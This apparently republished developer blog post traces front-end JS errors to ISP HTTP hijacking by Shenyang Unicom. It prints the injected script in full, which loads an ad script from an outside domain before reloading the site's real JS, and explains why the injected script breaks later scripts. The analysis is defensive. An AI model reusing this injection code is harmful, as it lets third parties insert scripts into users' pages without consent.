Editor's note: a Fundebug customer, by analysing the alert data we provide, tracked down a very tricky problem: an ISP hijacking HTTP requests. His analysis is well worth reading, and it also reminds us that sites should move to HTTPS promptly to protect themselves.
Original article:
ISP hijacking of HTTP requests. Author: Mr_Qi. Copyright remains with the original author.
Recently our business system has been receiving a steady stream of front-end error emails.
A large number of the reporting IPs belonged to Shenyang China Unicom customers, so my first guess was ISP HTTP hijacking. Investigating on site showed that some of the JS on the failing page had not loaded. The difference was that the broken JS first inserted an advertising JS.
To rule DNS hijacking in or out I checked the Network panel.
The resolved IP was correct and was our own server's IP, which confirmed this was not a DNS attack.
Because the problem appeared across a large number of Shenyang Unicom users, it looked like an ISP-level problem (routers being compromised on such a wide scale seemed unlikely).
The returned JS was as follows:
(function () {
  try {
    var o = 'm-_-m', // marker id; the injected ad <script> is given this id
      D = document;
    // Only act once per page: do nothing if the marker element already exists
    if (!D.getElementById(o)) {
      var j = 'http://yunxiu.f6car.com/kzf6/js/basic/XXX.js', // the real script that was hijacked
        J = j + (~j.indexOf('?') ? '&' : '?') + new Date().getTime(), // cache-busted URL of the real script
        M = 'http://pc.quansj.cn/?cid=08', // the injected ad script
        C = D.currentScript,
        H = D.getElementsByTagName('head')[0],
        N = function (s, i) { // append <script src=s [id=i]> to <head>
          var I = D.createElement('script');
          I.type = 'text/JavaScript';
          if (i) I.id = i;
          I.src = s;
          H.appendChild(I);
        };
      // In the top-level window, insert the ad script carrying the marker id
      if (self == top) {
        N(M, o);
      }
      // Fallback for browsers without document.currentScript: find this tag by its src
      if (!C) {
        C = (function () {
          var S = D.scripts,
            l = S.length,
            i = 0;
          for (; i < l; ++i) {
            if (S[i].src === j) {
              return S[i];
            }
          }
        })();
      }
      // Load the real script: append it if this tag is defer/async, otherwise
      // document.write it so that it runs synchronously in this tag's place
      C && ((C.defer || C.async) ? N(J) : D.write('<script src="' + J + '"><' + '/script>'));
    }
  } catch (e) {}
})();
A reverse Whois lookup on the domain
turned up the other domains held by the same registrant,
several of which are ad-hijacking sites.
The registrant apparently shares a name with a stand-up comedian (an apprentice of Zhao Benshan)……… surely not the same person /(ㄒoㄒ)/~~
Talking to Shenyang Unicom got nowhere; they flatly denied any hijacking. We are now seeking help from the MIIT, with no idea whether a solution will come of it.
There is already an adblock rule on GitHub for this address…… clearly Liaoning Unicom.
Looking at the JS logic, in the normal case execution reaches
C&&((C.defer||C.async)?N(J):D.write('<script src="'+J+'"><'+'/script>'));
The code checks the script tag: if it has defer or async, it appends the JS directly and loads it asynchronously; if not, it writes it with document.write (synchronous execution).
In theory, then, the JS on our server should still be loaded synchronously; in practice a large number of JS files were never loaded.
Some research turned up a Chrome setting (reportedly an optimisation introduced in Chrome 55(?)+) that seemed worth trying:
chrome://flags/#disallow-doc-written-script-loads
The specific description is as follows:
Third party snippets sometimes use document.write() to load scripts. Fortunately, most third parties provide asynchronous loading alternatives, which allow third party scripts to load without blocking the display of the rest of the content on the page.
With this data in mind, Chrome, starting with version 55, intervenes on behalf of all users when we detect this known-bad pattern by changing how document.write() is handled in Chrome (See Chrome Status). Specifically Chrome will not execute the <script> elements injected via document.write() when all of the following conditions are met:
- The user is on a slow connection, specifically when the user is on 2G. (In the future, the change might be extended to other users on slow connections, such as slow 3G or slow WiFi.)
- The document.write() is in a top level document. The intervention does not apply to document.written scripts within iframes as they don't block the rendering of the main page.
- The script in the document.write() is parser-blocking. Scripts with the 'async' or 'defer' attributes will still execute.
- The script is not hosted on the same site. In other words, Chrome will not intervene for scripts with a matching eTLD+1 (e.g. a script hosted on js.example.org inserted on www.example.org).
- The script is not already in the browser HTTP cache. Scripts in the cache will not incur a network delay and will still execute.
- The request for the page is not a reload. Chrome will not intervene if the user triggered a reload and will execute the page as normal.
It seems we do not meet condition 4, so I set this aside for the moment.
After formatting the code I was alarmed…… the whole premise for loading the JS is that the page contains no node with id m-_-m. Otherwise the JS is not loaded at all, i.e. document.write is never executed.
So if, unluckily, two or more JS files on our page are hijacked, then every one of them except the first will fail to load.
I then checked the JS requests (the ones carrying the query string) and found
that the client had indeed requested commonjs at the time, meaning commonjs had been hijacked too. At that point the m-_-m node was already present in the page, so none of the other hijacked JS files loaded the real JS………
A word, too, about the hijacking (redirect?) of our homepage:
this one is clearly hijacking by Jiangsu broadband (Nanjing Telecom)……
You are welcome to join our Fundebug full-stack bug monitoring QQ group: 622902485.